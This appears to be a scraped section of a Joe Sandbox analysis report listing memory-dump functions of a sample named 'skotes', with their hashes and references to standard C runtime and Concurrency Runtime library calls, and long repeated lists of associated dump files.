Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: ff4ecc2b4c96439cf4ed42d21673ff17a9682d041d73819743df9b65d3226410
Instruction ID: 10cbf4c553f32a99b29d21dedcc7eb1d51cf5285ac80ee2cb09dfeade9188058
Opcode Fuzzy Hash: ff4ecc2b4c96439cf4ed42d21673ff17a9682d041d73819743df9b65d3226410
Instruction Fuzzy Hash: 56F02B35700224A38720FA55FC428AEF3789F80729BA0812FEC0517182DB7CAA19C69E

Function 0043504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00435115
___AdjustPointer.LIBCMT ref: 00435138
___AdjustPointer.LIBCMT ref: 004351D4

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
Instruction ID: de7e3e00fb04a34b96eeb7253be455e546d1f1f5c91bb76df3f696651397a324
Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
Instruction Fuzzy Hash: 5851E171A01A06AFEF289F55D841BBB73B4EF18304F14516FE80197291E739ED41CB99

Function 00434C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00434C66
TypeidsEqual.LIBVCRUNTIME ref: 00434C8B
PMDtoOffset.LIBCMT ref: 00434CA1
PMDtoOffset.LIBCMT ref: 00434D22

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: cef6b095d55e150eee694991f596d606281b118854b35fc2e5d75d5fbf24ef20
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: C851BC35A042099FDF10CFA8C4806EEBBF4EF89354F14649BE850A7361D33ABA05CB54

Function 0042DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB64

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DBE9
Concurrency::location::_Assign.LIBCMT ref: 0042DC56

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction ID: de4f072aaf1dca0b17399bd929b16a9a875841cf6160958f8114d71bd43867b1
Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction Fuzzy Hash: 84412774B04220ABCF199B25D895BAEBB75AF45310F40409FE5065B3C2CB78AD45C7D9

Function 004256AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 004256F2
_InternalDeleteHelper.LIBCONCRT ref: 00425726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0042578B
SafeRWList.LIBCONCRT ref: 0042579A

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: f9dfe76084c308ebb478c199ba73ea37ed632e16b00600a2dd3316f2449816c2
Instruction ID: 9025ef7764402749ef94f8758de115d8ae74e5693090e9705a360914ec2c5955
Opcode Fuzzy Hash: f9dfe76084c308ebb478c199ba73ea37ed632e16b00600a2dd3316f2449816c2
Instruction Fuzzy Hash: B8314836B416209FCF059F20D881AAE77A6EFC8714F5442BAED0A9B355DF34AC058794

Function 00422CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
